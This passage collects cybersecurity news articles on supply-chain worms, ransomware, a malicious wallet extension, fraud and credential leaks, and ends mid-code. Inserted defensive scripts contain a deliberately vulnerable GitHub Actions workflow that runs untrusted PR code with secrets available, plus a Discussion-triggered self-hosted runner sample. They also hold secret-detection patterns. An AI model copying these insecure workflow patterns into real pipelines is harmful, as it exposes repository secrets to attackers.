Category: Cybersecurity

  • Shai-Hulud v2 Campaign Spreads From npm to Maven, Exposing Thousands of Secrets

    The second wave of the Shai-Hulud supply chain attack has spilled over to the Maven ecosystem after compromising more than 830 packages in the npm registry.

    The Socket Research Team said it identified a Maven Central package named org.mvnpm:posthog-node:4.18.1 that embeds the same two components associated with Sha1-Hulud: the “setup_bun.js” loader and the main payload “bun_environment.js.”

    “This means the PostHog project has compromised releases in both the JavaScript/npm and Java/Maven ecosystems, driven by the same Shai Hulud v2 payload,” the cybersecurity company said in a Tuesday update.

    It’s worth noting that the Maven Central package is not published by PostHog itself. Rather, the “org.mvnpm” coordinates are generated by an automated mvnpm process that rebuilds npm packages as Maven artifacts. Maven Central said it is working to implement extra protections to prevent known-compromised npm components from being rebundled. As of November 25, 2025, 22:44 UTC, all mirrored copies have been purged.

    The development comes as the “second coming” of the supply chain incident has targeted developers globally with an aim to steal sensitive data like API keys, cloud credentials, and npm and GitHub tokens, and facilitate deeper supply chain compromise in a worm-like fashion. The latest iteration has also evolved to be more stealthy, aggressive, scalable, and destructive.

    Besides borrowing the overall infection chain of the initial September variant, the attack allows threat actors to gain unauthorized access to npm maintainer accounts and publish trojanized versions of their packages. When unsuspecting developers download and run these libraries, the embedded malicious code backdoors their own machines and scans for secrets and exfiltrates them to GitHub repositories using the stolen tokens.

    The attack accomplishes this by injecting two rogue workflows, one of which registers the victim machine as a self-hosted runner and enables arbitrary command execution whenever a GitHub Discussion is opened. A second workflow is designed to systematically harvest all secrets. Over 28,000 repositories have been affected by the incident.

    “This version significantly enhances stealth by utilizing the Bun runtime to hide its core logic and increases its potential scale by raising the infection cap from 20 to 100 packages,” Cycode’s Ronen Slavin and Roni Kuznicki said. “It also uses a new evasion technique, exfiltrating stolen data to randomly named public GitHub repositories instead of a single, hard-coded one.”

    The attacks illustrate how trivial it is for attackers to take advantage of trusted software distribution pathways to push malicious versions at scale and compromise thousands of downstream developers. What’s more, the self-replicating nature of the malware means a single infected account is enough to amplify the blast radius of the attack and turn it into a widespread outbreak in a short span of time.

    Further analysis by Aikido has uncovered that the threat actors exploited vulnerabilities, specifically focusing on CI misconfigurations in pull_request_target and workflow_run workflows, in existing GitHub Actions workflows to pull off the attack and compromise projects associated with AsyncAPI, PostHog, and Postman.

    The vulnerability “used the risky pull_request_target trigger in a way that allowed code supplied by any new pull request to be executed during the CI run,” security researcher Ilyas Makari said. “A single misconfiguration can turn a repository into a patient zero for a fast-spreading attack, giving an adversary the ability to push malicious code through automated pipelines you rely on every day.”
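
    As an added example (not code from the article or from any vendor it cites), a heuristic audit script for the two workflow patterns described above: a pull_request_target or workflow_run workflow that checks out untrusted PR code and runs an install step, and a Discussion-triggered job on a self-hosted runner. The sample workflows are constructed for illustration and the function names are assumptions of this example.

```python
"""Heuristic audit of GitHub Actions workflow files for two risky patterns:
(1) a privileged trigger (pull_request_target / workflow_run) that checks out
the untrusted PR head and then runs an install or build step with repo secrets,
and (2) a Discussion-triggered job on a self-hosted runner, optionally expanding
event text inside a shell step.  Line-based regex heuristics, not a YAML
parser, so multi-line `run: |` blocks are only partially covered."""
import re

ON_RE = re.compile(r'^(["\']?)on\1:')  # top-level trigger key, quoted or bare
# Triggers that run with the base repository's secrets even for forked PRs.
PRIVILEGED_PR_TRIGGERS = {"pull_request_target", "workflow_run"}
KNOWN_TRIGGERS = PRIVILEGED_PR_TRIGGERS | {
    "pull_request", "push", "discussion", "discussion_comment", "issue_comment"}
# Checkout of the PR / workflow_run head instead of the trusted base commit.
HEAD_REF_RE = re.compile(
    r"github\.event\.(pull_request|workflow_run)\.head(_sha|_branch|\.sha|\.ref)")
# Commands that execute code from the checked-out tree (lifecycle scripts, Makefiles).
INSTALL_RE = re.compile(
    r"\b(npm (ci|install)|yarn( install)?|pnpm (i|install)|pip install|make)\b")
SELF_HOSTED_RE = re.compile(r"runs-on:.*\bself-hosted\b")
# Attacker-controlled event text expanded directly inside a shell step.
INJECTION_RE = re.compile(
    r"\$\{\{\s*github\.event\.[\w.]*(body|title|head_ref|label|message)\b")


def trigger_block(text: str) -> str:
    """Return the top-level 'on:' section (stops at the next top-level key)."""
    out, inside = [], False
    for line in text.splitlines():
        if ON_RE.match(line):
            inside = True
        elif inside and line and not line[0].isspace():
            break
        if inside:
            out.append(line)
    return "\n".join(out)


def triggers(text: str) -> set:
    """Names of known event triggers declared in the workflow's 'on:' section."""
    block = trigger_block(text)
    return {t for t in KNOWN_TRIGGERS if re.search(rf"\b{t}\b", block)}


def audit_workflow(text: str) -> list:
    """Return (code, message) findings for the contents of one workflow file."""
    findings = []
    trig = triggers(text)
    if (trig & PRIVILEGED_PR_TRIGGERS) and HEAD_REF_RE.search(text) and INSTALL_RE.search(text):
        findings.append(("PR_HEAD_EXECUTED",
                         "privileged trigger checks out the PR head and runs an "
                         "install/build step while repository secrets are available"))
    if (trig & {"discussion", "discussion_comment"}) and SELF_HOSTED_RE.search(text):
        findings.append(("SELF_HOSTED_DISCUSSION",
                         "Discussion-triggered job runs on a self-hosted runner"))
    for line in text.splitlines():
        if "run:" in line and INJECTION_RE.search(line):
            findings.append(("EVENT_INJECTION",
                             f"event text expanded in a shell step: {line.strip()}"))
    return findings


# Constructed sample: the misconfiguration the article describes.
VULNERABLE_WORKFLOW = """\
name: CI
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm install
      - run: npm test
        env:
          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed sample: same job on the unprivileged pull_request trigger, base checkout.
HARDENED_WORKFLOW = """\
name: CI
on:
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
"""

# Constructed sample modelled on the Discussion-triggered self-hosted runner pattern.
RUNNER_WORKFLOW = """\
name: Discussion handler
on:
  discussion:
    types: [created]
jobs:
  process:
    runs-on: self-hosted
    steps:
      - run: echo "${{ github.event.discussion.title }}"
"""

if __name__ == "__main__":
    for name, wf in [("vulnerable", VULNERABLE_WORKFLOW), ("hardened", HARDENED_WORKFLOW),
                     ("runner", RUNNER_WORKFLOW)]:
        print(name, audit_workflow(wf))
```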

    It’s assessed that the activity is the continuation of a broader set of attacks targeting the ecosystem that commenced with the August 2025 S1ngularity campaign impacting several Nx packages on npm.

    “As a new and significantly more aggressive wave of npm supply chain malware, Shai-Hulud 2 combines stealthy execution, credential breadth, and fallback destructive behavior, making it one of the most impactful supply chain attacks of the year,” Nadav Sharkazy, a product manager at Apiiro, said in a statement.

    “This malware shows how a single compromise in a popular library can cascade into thousands of downstream applications by trojanizing legitimate packages during installation.”

    Data compiled by GitGuardian, OX Security, and Wiz shows that the campaign has leaked hundreds of GitHub access tokens and credentials associated with Amazon Web Services (AWS), Google Cloud, and Microsoft Azure. More than 5,000 files were uploaded to GitHub with the exfiltrated secrets. GitGuardian’s analysis of 4,645 GitHub repositories has identified 11,858 unique secrets, out of which 2,298 remained valid and publicly exposed as of November 24, 2025.

    Users are advised to rotate all tokens and keys, audit all dependencies, remove compromised versions, reinstall clean packages, and harden developer and CI/CD environments with least-privilege access, secret scanning, and automated policy enforcement.

    “Sha1-Hulud is another reminder that the modern software supply chain is still way too easy to break,” Dan Lorenc, co-founder and CEO of Chainguard, said. “A single compromised maintainer and a malicious install script is all it takes to ripple through thousands of downstream projects in a matter of hours.”

    “The techniques attackers are using are constantly evolving. Most of these attacks don’t rely on zero-days. They exploit the gaps in how open source software is published, packaged, and pulled into production systems. The only real defense is changing the way software gets built and consumed.”


    Source: thehackernews.com…

  • Qilin Ransomware Turns South Korean MSP Breach Into 28-Victim 'Korean Leaks' Data Heist

    South Korea’s financial sector has been targeted by what has been described as a sophisticated supply chain attack that led to the deployment of Qilin ransomware.

    “This operation combined the capabilities of a major Ransomware-as-a-Service (RaaS) group, Qilin, with potential involvement from North Korean state-affiliated actors (Moonstone Sleet), leveraging Managed Service Provider (MSP) compromise as the initial access vector,” Bitdefender said in a report shared with The Hacker News.

    Qilin has emerged as one of the most active ransomware operations this year, with the RaaS crew exhibiting “explosive growth” in the month of October 2025 by claiming over 180 victims. The group is responsible for 29% of all ransomware attacks, per data from NCC Group.

    The Romanian cybersecurity company said it decided to dig deeper after uncovering an unusual spike in ransomware victims from South Korea in September 2025, when it became the second-most affected country by ransomware after the U.S., with 25 cases, a significant jump from an average of about 2 victims per month between September 2024 and August 2025.

    Further analysis found that all 25 cases were attributed exclusively to the Qilin ransomware group, with 24 of the victims in the financial sector. The campaign was given the moniker Korean Leaks by the attackers themselves.

    While Qilin’s origins are likely Russian, the group describes itself as “political activists” and “patriots of the country.” It follows a traditional affiliate model, which involves recruiting a diverse group of hackers to carry out the attacks in return for taking a small share of up to 20% of the illicit payments.

    One particular affiliate of note is a North Korean threat actor tracked as Moonstone Sleet, which, according to Microsoft, has deployed a custom ransomware variant called FakePenny in an attack targeting an unnamed defense technology company in April 2024.

    Then, earlier this February, a significant pivot occurred when the adversary was observed delivering Qilin ransomware at a limited number of organizations. While it’s not exactly clear if the latest set of attacks was indeed carried out by the hacking group, the targeting of South Korean businesses aligns with its strategic objectives.

    Korean Leaks took place over three publication waves, resulting in the theft of over 1 million files and 2 TB of data from 28 victims. Victim posts associated with four other entities were removed from the data leak site (DLS), suggesting that they may have been taken down either following ransom negotiations or a unique internal policy, Bitdefender said.

    The three waves are as follows:

    • Wave 1, comprising 10 victims from the financial management sector, published on September 14, 2025
    • Wave 2, comprising nine victims published between September 17 and 19, 2025
    • Wave 3, comprising nine victims published between September 28 and October 4, 2025

    An unusual aspect about these leaks is the departure from established tactics of exerting pressure on compromised organizations, instead leaning heavily on propaganda and political language.

    “The entire campaign was framed as a public-service effort to expose systemic corruption, exemplified by the threats to release files that could be ‘evidence of stock market manipulation’ and names of ‘well-known politicians and businessmen in Korea,’” Bitdefender said of the first wave of the campaign.

    Subsequent waves went on to escalate the threat a notch higher, claiming that the leak of the data could pose a severe risk to the Korean financial market. The actors also called on South Korean authorities to investigate the case, citing stringent data protection laws.

    A further shift in messaging was observed in the third wave, where the group initially continued the same theme of a national financial crisis resulting from the release of stolen information, but then switched to a language that “more closely resembled Qilin’s typical, financially motivated extortion messages.”

    Given that Qilin boasts of an “in-house team of journalists” to help affiliates with writing texts for blog posts and help apply pressure during negotiations, it’s assessed that the group’s core members were behind the publication of the DLS text.

    “The posts contain several of the core operator’s signature grammatical inconsistencies,” Bitdefender said. “However, this control over the final draft does not mean the affiliate was excluded from having a critical say in the key messaging or overall direction of the content.”

    To pull off these attacks, the Qilin affiliate is said to have breached a single upstream managed service provider (MSP), leveraging the access to compromise several victims at once. On September 23, 2025, the Korea JoongAng Daily reported that more than 20 asset management companies in the country were infected with ransomware following the compromise of GJTec.

    To mitigate these risks, it’s essential that organizations enforce Multi-Factor Authentication (MFA), apply the Principle of Least Privilege (PoLP) to restrict access, segment critical systems and sensitive data, and take proactive steps to reduce attack surfaces.

    “The MSP compromise that triggered the ‘Korean Leaks’ operation highlights a critical blind spot in cybersecurity discussions,” Bitdefender said. “Exploiting a vendor, contractor, or MSP that has access to other businesses is a more prevalent and practical route that RaaS groups seeking clustered victims can take.”


    Source: thehackernews.com…

  • When Your $2M Security Detection Fails: Can your SOC Save You?

    Enterprises today are expected to have at least 6-8 detection tools, as detection is considered a standard investment and the first line of defense. Yet security leaders struggle to justify dedicating resources further down the alert lifecycle to their superiors.

    As a result, most organizations’ security investments are asymmetrical: robust detection tools paired with an under-resourced SOC, their last line of defense.

    A recent case study demonstrates how companies with a standardized SOC prevented a sophisticated phishing attack that bypassed leading email security tools. In this case study, a cross-company phishing campaign targeted C-suite executives at multiple enterprises. Eight different email security tools across these organizations failed to detect the attack, and phishing emails reached executive inboxes. However, each organization’s SOC team detected the attack immediately after employees reported the suspicious emails.

    Why did all eight detection tools identically fail where the SOC succeeded?

    What all these organizations have in common is a balanced investment across the alert lifecycle, which doesn’t neglect their SOC.

    This article examines how investing in the SOC is indispensable for organizations that have already allocated significant resources to detection tools. Additionally, a balanced SOC investment is crucial for maximizing the value of their existing detection investments.

    Detection tools and the SOC operate in parallel universes

    Understanding this fundamental disconnect explains how security gaps arise:

    Detection tools operate in milliseconds. They must make instant decisions on millions of signals every day. They have no time for nuance; speed is essential. Without it, networks would come to a halt, as every email, file, and connection request would be held up for analysis.

    Detection tools zoom in. They are the first to identify and isolate potential threats, but they lack an understanding of the bigger picture. Meanwhile, SOC teams operate with a 30,000-foot view. When alerts reach analysts, they have something detection tools lack: time and context.

    Consequently, the SOC tackles alerts from a different perspective:

    1. They can analyze behavioral patterns, such as why an executive suddenly logs in from a datacenter IP address when they usually work from London.
    2. They can stitch data across tools. They can view a clean reputation email domain along with subsequent authentication attempts and user reports.
    3. They can identify patterns that only make sense when seen together, such as exclusive targeting of finance executives combined with timing that aligns with payroll cycles.

    Three critical risks of an underfunded SOC

    First, it can make it more difficult for executive leadership to identify the root of the problem. CISOs and budget holders in organizations that deploy various detection tools often assume their investments will keep them safe. Meanwhile, the SOC experiences this differently, overwhelmed by noise and lacking the resources to properly investigate real threats. Because detection spending is obvious, while SOC struggles happen behind closed doors, security leaders find it challenging to demonstrate the need for additional investment in their SOC.

    Second, the asymmetry overwhelms the last line of defense. Significant investments in multiple detection tools produce thousands of alerts that flood the SOC every day. With underfunded SOCs, analysts become goalies facing hundreds of shots at once, forced to make split-second decisions under immense pressure.

    Third, it undermines the ability to identify nuanced threats. When the SOC is overwhelmed by alerts, the capacity for detailed investigative work is lost. The threats that escape detection are the ones that detection tools would never catch in the first place.

    From temporary fixes to sustainable SOC operations

    When detection tools generate hundreds of alerts daily, adding a few more SOC analysts is as effective as trying to save a sinking ship with a bucket. The traditional alternative has been outsourcing to MSSPs or MDRs and assigning external teams to handle overflow.

    But for many, the trade-offs are still too much: high ongoing costs, shallow analyst investigations that are unfamiliar with your environment, delays in coordination, and broken communication. Outsourcing doesn’t fix the imbalance; it just shifts the burden onto someone else’s plate.

    Today, AI SOC platforms are becoming the preferred choice for organizations with lean SOC teams looking for an efficient, cost-effective, and scalable solution. AI SOC platforms operate at the investigation layer where contextual reasoning happens, automate alert triage, and surface only high-fidelity incidents after assigning them context.

    With the help of AI SOC, analysts save hundreds of hours each month, as false-positive rates often drop by more than 90%. This automated coverage enables small internal teams to provide 24/7 coverage without additional staffing or outsourcing. The companies featured in this case study invested in this approach through Radiant Security, an agentic AI SOC platform.

    2 ways SOC investment pays off, now and later

    1. SOC investments make the cost of detection tools worthwhile. Your detection tools are only as effective as your ability to investigate their alerts. When 40% of alerts go uninvestigated, you’re not getting the full value of every detection tool you own. Without sufficient SOC capacity, you’re paying for detection capabilities that you can’t fully utilize.
    2. The last line’s unique perspective will become increasingly critical. SOC will become increasingly essential as detection tools fail more often. As attacks grow more sophisticated, detection will need more context. The SOC’s perspective will mean only they can connect these dots and see the entire picture.

    3 questions to guide your next security budget

    1. Is your security investment symmetric? Begin by assessing your resource allocation for imbalance. The first indication of asymmetrical security is having more alerts than your SOC can handle. If your analysts are overwhelmed by alerts, it means your frontline is exceeding your backline.
    2. Is your SOC a qualified safety net? Every SOC leader must ask, if detection fails, is the SOC prepared to catch what gets through? Many organizations never ask this because they don’t see detection as the SOC’s responsibility. But when detection tools fail, responsibilities shift.
    3. Are you underutilizing existing tools? Many organizations find that their detection tools produce valuable signals that no one has time to investigate. Asymmetry means lacking the ability to act on what you already possess.

    Key takeaways from Radiant Security

    Most security teams have the opportunity to allocate resources to maximize ROI from their current detection investments, support future growth, and enhance protection. Organizations that invest in detection tools but neglect their SOC create blind spots and burnout.

    Radiant Security, the agentic AI SOC platform highlighted in the case study, shows success through balanced security investment. Radiant works at the SOC investigation layer, automatically triaging every alert, cutting false positives by about 90%, and analyzing threats at machine speed, like a top analyst. With over 100 integrations with existing security tools and one-click response features, Radiant helps lean security teams investigate any alert, known or unknown, without needing impossible headcount increases. Radiant Security makes enterprise-grade SOC capabilities available to organizations of any size.


    Source: thehackernews.com…

  • Webinar: Learn to Spot Risks and Patch Safely with Community-Maintained Tools

    Nov 26, 2025 | The Hacker News | Software Security / Patch Management

    If you’re using community tools like Chocolatey or Winget to keep systems updated, you’re not alone. These platforms are fast, flexible, and easy to work with—making them favorites for IT teams. But there’s a catch…

    The very tools that make your job easier might also be the reason your systems are at risk.

    These tools are run by the community. That means anyone can add or update packages. Some packages may be old, missing safety checks, or changed by mistake or on purpose. Hackers look for these weak spots. This has already happened in places like NPM and PyPI. The same risks can happen with Windows tools too.

    To help you patch safely without slowing down, there’s a free webinar coming up. It’s led by Gene Moody, Field CTO at Action1. He’ll walk through how these tools work, where the risks are, and how to protect your systems while keeping updates on track.

    In this session, he’ll test how safe these tools really are. You’ll get practical steps you can use right away—nothing theoretical, just what works.

    The goal is not to scare you away from community tools. They’re useful. But they need guardrails—rules that help you use them safely without slowing you down.

    You will learn:

    🔒 How to spot hidden risks

    ⚙️ How to set safety checks like source pinning, allow-lists, and hash/signature verification

    📊 How to prioritize updates using known vulnerability data (KEV)

    📦 How to choose between community tools, direct vendor sources, or a mix of both

    If you’re not sure when to use community repos and when to go straight to the vendor, this session will help you decide. You’ll also see how to mix both in a safe way.

    This webinar is for anyone who manages software updates—whether you’re on a small team or a large one. If you’ve ever wondered what’s really inside that next patch, this session is for you.

    It’s free to attend, and you’ll leave with clear actions you can apply the same day. Save your spot here.


    Source: thehackernews.com…

  • Chrome Extension Caught Injecting Hidden Solana Transfer Fees Into Raydium Swaps

    Nov 26, 2025 | Ravie Lakshmanan | Browser Security / Cryptocurrency

    Cybersecurity researchers have discovered a new malicious extension on the Chrome Web Store that’s capable of injecting a stealthy Solana transfer into a swap transaction and transferring the funds to an attacker-controlled cryptocurrency wallet.

    The extension, named Crypto Copilot, was first published by a user named “sjclark76” on May 7, 2024. The developer describes the browser add-on as offering the ability to “trade crypto directly on X with real-time insights and seamless execution.” The extension has 12 installs and remains available for download as of writing.

    “Behind the interface, the extension injects an extra transfer into every Solana swap, siphoning a minimum of 0.0013 SOL or 0.05% of the trade amount to a hardcoded attacker-controlled wallet,” Socket security researcher Kush Pandya said in a Tuesday report.

    Specifically, the extension incorporates obfuscated code that comes to life when a user performs a Raydium swap, manipulating it to inject an undisclosed SOL transfer into the same signed transaction. Raydium is a decentralized exchange (DEX) and automated market maker (AMM) built on the Solana blockchain.

    It works by appending a hidden transfer instruction, built with the SystemProgram.transfer helper, to each swap before the user’s signature is requested, sending the fee to a hard-coded wallet embedded in the code. The fee is calculated from the amount traded: a minimum of 0.0013 SOL for trades up to 2.6 SOL, and 0.05% of the swap amount if it’s more than 2.6 SOL. To avoid detection, the malicious behavior is concealed using techniques like minification and variable renaming.

    The extension also communicates with a backend hosted on the domain “crypto-coplilot-dashboard.vercel[.]app” to register connected wallets, fetch points and referral data, and report user activity. The domain, along with “cryptocopilot[.]app,” does not host any real product.

    What’s notable about the attack is that users are completely kept in the dark about the hidden platform fee, and the user interface only shows details of the swap. Furthermore, Crypto Copilot makes use of legitimate services like DexScreener and Helius RPC to lend it a veneer of trust.

    “Because this transfer is added silently and sent to a personal wallet rather than a protocol treasury, most users will never notice it unless they inspect each instruction before signing,” Pandya said. “The surrounding infrastructure appears designed only to pass Chrome Web Store review and provide a veneer of legitimacy while siphoning fees in the background.”


    Source: thehackernews.com…

  • RomCom Uses SocGholish Fake Update Attacks to Deliver Mythic Agent Malware

    Nov 26, 2025 | Ravie Lakshmanan | Malware / Cyber Espionage

    The threat actors behind a malware family known as RomCom targeted a U.S.-based civil engineering company via a JavaScript loader dubbed SocGholish to deliver the Mythic Agent.

    “This is the first time that a RomCom payload has been observed being distributed by SocGholish,” Arctic Wolf Labs researcher Jacob Faires said in a Tuesday report.

    The activity has been attributed with medium-to-high confidence to Unit 29155 of Russia’s Main Directorate of the General Staff of the Armed Forces of the Russian Federation, also known as GRU. According to the cybersecurity company, the targeted entity had worked for a city with close ties to Ukraine in the past.

    SocGholish (aka FakeUpdates), linked to a financially motivated operator tracked as TA569 (aka Gold Prelude, Mustard Tempest, Purple Vallhund, and UNC1543), serves as an initial access broker, allowing other threat actors to drop a wide range of payloads. Some of its known customers are Evil Corp, LockBit, Dridex, and Raspberry Robin.

    The attack chains typically involve serving fake browser update alerts for Google Chrome or Mozilla Firefox on legitimate-but-compromised websites to trick unsuspecting users into downloading malicious JavaScript that’s responsible for installing a loader, which then fetches additional malware.

    For the most part, the attacks single out websites that are poorly secured, taking advantage of known security vulnerabilities in plugins to inject JavaScript code that’s designed to display the pop-up and activate the infection chain.

    RomCom (aka Nebulous Mantis, Storm-0978, Tropical Scorpius, UNC2596, or Void Rabisu), on the other hand, is the name assigned to a Russia-aligned threat actor that’s known to dabble in both cybercrime and espionage operations since at least 2022.

    The threat actor leverages several methods, including spear-phishing and zero-day exploits, to breach target networks and drop the eponymous remote access trojan (RAT) on victim machines. Attacks mounted by the hacking group have singled out entities in Ukraine, as well as NATO-related defense organizations.

    In the attack analyzed by Arctic Wolf, the fake update payload allows the threat actors to run commands on the compromised machine by means of a reverse shell established to a command-and-control (C2) server. This includes conducting reconnaissance and dropping a custom Python backdoor codenamed VIPERTUNNEL.

    Also delivered is a RomCom-linked DLL loader that launches the Mythic Agent, a core component of Mythic, a cross-platform post-exploitation red-teaming framework in which the agent communicates with a corresponding server to support command execution, file operations, and more.

    While the attack was ultimately unsuccessful and was blocked before it could progress any further, the development shows the RomCom threat actor’s continued interest in targeting Ukraine or entities providing assistance to the country, no matter how tenuous the connection may be.

    “The timeline from infection via [the fake update] to the delivery of RomCom’s loader was less than 30 minutes,” Jacob Faires said. “Delivery is not made until the target’s Active Directory domain has been verified to match a known value provided by the threat actor.”

    “The widespread nature of SocGholish attacks and the relative speed at which the attack progresses from initial access to infection makes it a potent threat to organizations worldwide.”


    Source: thehackernews.com…

  • FBI Reports $262M in ATO Fraud as Researchers Cite Growing AI Phishing and Holiday Scams

    The U.S. Federal Bureau of Investigation (FBI) has warned that cybercriminals are impersonating financial institutions with an aim to steal money or sensitive information to facilitate account takeover (ATO) fraud schemes.

    The activity targets individuals, businesses, and organizations of varied sizes and across sectors, the agency said, adding the fraudulent schemes have led to more than $262 million in losses since the start of the year. The FBI said it has received over 5,100 complaints.

    ATO fraud typically refers to attacks that enable threat actors to obtain unauthorized access to an online financial institution account, payroll system, or health savings account to siphon data and funds for personal gain. The access is often obtained by approaching targets through social engineering techniques, such as texts, calls, and emails that prey on users’ fears, or via bogus websites.

    These methods make it possible for attackers to deceive users into providing their login credentials on a phishing site, in some instances by urging them to click on a link to report purported fraudulent transactions recorded against their accounts.

    “A cybercriminal manipulates the account owner into giving away their login credentials, including multi-factor authentication (MFA) code or One-Time Passcode (OTP), by impersonating a financial institution employee, customer support, or technical support personnel,” the FBI said.

    “The cybercriminal then uses login credentials to log into the legitimate financial institution website and initiate a password reset, ultimately gaining full control of the accounts.”

    Other cases involve threat actors masquerading as financial institutions contacting account owners, claiming their information was used to make fraudulent purchases, including firearms, and then convincing them to provide their account information to a second cybercriminal impersonating law enforcement.

    The FBI said ATO fraud can also involve the use of Search Engine Optimization (SEO) poisoning to trick users looking for businesses on search engines into clicking on phony links that redirect to a lookalike site by means of malicious search engine ads.

    Regardless of the method used, the attacks have one aim: to seize control of the accounts, swiftly wire funds to other accounts under the attackers’ control, and change the passwords, effectively locking out the account owner. The receiving accounts are in turn linked to cryptocurrency wallets to convert the funds into digital assets and obscure the money trail.

    To stay protected against the threat, users are advised to be careful about what they share about themselves online or on social media, regularly monitor accounts for any financial irregularities, use unique, complex passwords, verify the URL of banking websites before signing in, and stay vigilant against phishing attacks or suspicious callers.

    “By openly sharing information like a pet’s name, schools you have attended, your date of birth, or information about your family members, you may give scammers the information they need to guess your password or answer your security questions,” the FBI said.

    “The large majority of ATO accounts referenced in the FBI announcement occur through compromised credentials used by threat actors intimately familiar with the internal processes and workflows for money movement within financial institutions,” Jim Routh, chief trust officer at Saviynt, said in a statement.

    “The most effective controls to prevent these attacks are manual (phone calls for verification) and SMS messages for approval. The root cause continues to be the accepted use of credentials for cloud accounts despite having passwordless options available.”

    The development comes as Darktrace, Flashpoint, Forcepoint, Fortinet, and Zimperium have highlighted the major cybersecurity threats ahead of the holiday season, including Black Friday scams, QR code fraud, gift card draining, and high-volume phishing campaigns that mimic popular brands like Amazon and Temu.

    Many of these activities leverage artificial intelligence (AI) tools to produce highly persuasive phishing emails, fake websites, and social media ads, allowing even low-skill attackers to pull off attacks that appear trustworthy and increase the success rate of their campaigns.


    Fortinet FortiGuard Labs said it detected at least 750 malicious, holiday-themed domains registered over the last three months, with many using key terms like “Christmas,” “Black Friday,” and “Flash Sale.” “Over the last three months, more than 1.57 million login accounts tied to major e-commerce sites, available through stealer logs, were collected across underground markets,” the company said.

    Attackers have also been found actively exploiting security vulnerabilities across Adobe/Magento, Oracle E-Business Suite, WooCommerce, Bagisto, and other common e-commerce platforms. Some of the exploited vulnerabilities include CVE-2025-54236, CVE-2025-61882, and CVE-2025-47569.

    According to Zimperium zLabs, there has been a 4x increase in mobile phishing (aka mishing) sites, with attackers “leveraging trusted brand names to create urgency and deceive users into clicking, logging in, or downloading malicious updates.”

    What’s more, Recorded Future has called attention to purchase scams where threat actors use fake e-commerce stores to steal victim data and authorize fraudulent payments for non-existent goods and services. It described the scams as a “major emerging fraud threat.”

    “A sophisticated dark web ecosystem allows threat actors to quickly establish new purchase scam infrastructure and amplify their impact,” the company said. “Promotional activities mirroring traditional marketing – including an offer to sell stolen card data on the dark web carding shop PP24 – are widespread in this underground.”

    “Threat actors fund ad campaigns with stolen payment cards to spread purchase scams, which in turn compromise more payment card data, fueling a continuing cycle of fraud.”


    Source: thehackernews.com…

  • Years of JSONFormatter and CodeBeautify Leaks Expose Thousands of Passwords and API Keys

    Nov 25, 2025 | Ravie Lakshmanan | Data Exposure / Cloud Security

    New research has found that organizations in various sensitive sectors, including governments, telecoms, and critical infrastructure, are pasting passwords and credentials into online tools like JSONformatter and CodeBeautify that are used to format and validate code.

    Cybersecurity company watchTowr Labs said it captured a dataset of over 80,000 files on these sites, uncovering thousands of usernames, passwords, repository authentication keys, Active Directory credentials, database credentials, FTP credentials, cloud environment keys, LDAP configuration information, helpdesk API keys, meeting room API keys, SSH session recordings, and all kinds of personal information.

    This includes five years of historical JSONFormatter content and one year of historical CodeBeautify content, totalling over 5GB worth of enriched, annotated JSON data.


    Organizations impacted by the leak span critical national infrastructure, government, finance, insurance, banking, technology, retail, aerospace, telecommunications, healthcare, education, travel, and, ironically, cybersecurity sectors.

    “These tools are extremely popular, often appearing near the top of search results for terms like ‘JSON beautify’ and ‘best place to paste secrets’ (probably, unproven) — and used by a wide variety of organizations, organisms, developers, and administrators in both enterprise environments and for personal projects,” security researcher Jake Knott said in a report shared with The Hacker News.

    Both tools also offer the ability to save a formatted JSON structure or code, turning it into a semi-permanent, shareable link with others – effectively allowing anyone with access to the URL to access the data.

    As it happens, the sites not only provide a handy Recent Links page to list all recently saved links, but also follow a predictable URL format for the shareable link, thereby making it easier for a bad actor to retrieve all URLs using a simple crawler –

    • https://jsonformatter.org/{id-here}
    • https://jsonformatter.org/{formatter-type}/{id-here}
    • https://codebeautify.org/{formatter-type}/{id-here}

    Some examples of leaked information include Jenkins secrets, a cybersecurity company exposing encrypted credentials for sensitive configuration files, Know Your Customer (KYC) information associated with a bank, a major financial exchange’s AWS credentials linked to Splunk, and Active Directory credentials for a bank.


    To make matters worse, the company said it uploaded fake AWS access keys to one of these tools and found bad actors attempting to abuse them 48 hours after they were saved. This indicates that valuable information exposed through these sources is being scraped by other parties and tested, posing severe risks.

    “Mostly because someone is already exploiting it, and this is all really, really stupid,” Knott said. “We don’t need more AI-driven agentic agent platforms; we need fewer critical organizations pasting credentials into random websites.”

    When checked by The Hacker News, both JSONFormatter and CodeBeautify have temporarily disabled the save functionality, claiming they are “working on to make it better” and implementing “enhanced NSFW (Not Safe For Work) content prevention measures.”

    watchTowr said that the save functionality was disabled by these sites likely in response to the research. “We suspect this change occurred in September in response to communication from a number of the affected organizations we alerted,” it added.
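    As an added example (not watchTowr’s tooling and not code from either site), a small local formatter that pretty-prints JSON offline and redacts the credential types the report lists before the blob is shared anywhere; the key-name and value patterns, and the sample configuration, are constructed for illustration, and the AWS key is Amazon’s documented example value.

```python
import json
import re
from typing import Any

# Added example (not watchTowr's tooling): pretty-print JSON offline and
# redact the credential types the report lists before the blob is shared.
REDACTED = "[REDACTED]"

# Key names that normally hold a secret (constructed list, extend as needed).
SENSITIVE_KEY = re.compile(
    r"(pass(word|wd)?|secret|token|api[_-]?key|private[_-]?key|credential)", re.I)

# Value shapes that identify a secret regardless of the key name.
VALUE_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "jwt": re.compile(r"\beyJ[\w-]{10,}\.[\w-]{10,}\.[\w-]+"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "url_with_password": re.compile(r"[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.I),
}

def scan(obj: Any, path: str = "$") -> tuple[Any, list[tuple[str, str]]]:
    """Walk parsed JSON; return (redacted copy, [(json_path, reason), ...])."""
    if isinstance(obj, dict):
        out, hits = {}, []
        for key, val in obj.items():
            child = f"{path}.{key}"
            new_val, sub = scan(val, child)
            if isinstance(val, str) and val and SENSITIVE_KEY.search(str(key)):
                sub.insert(0, (child, f"sensitive key name '{key}'"))
                new_val = REDACTED
            out[key] = new_val
            hits.extend(sub)
        return out, hits
    if isinstance(obj, list):
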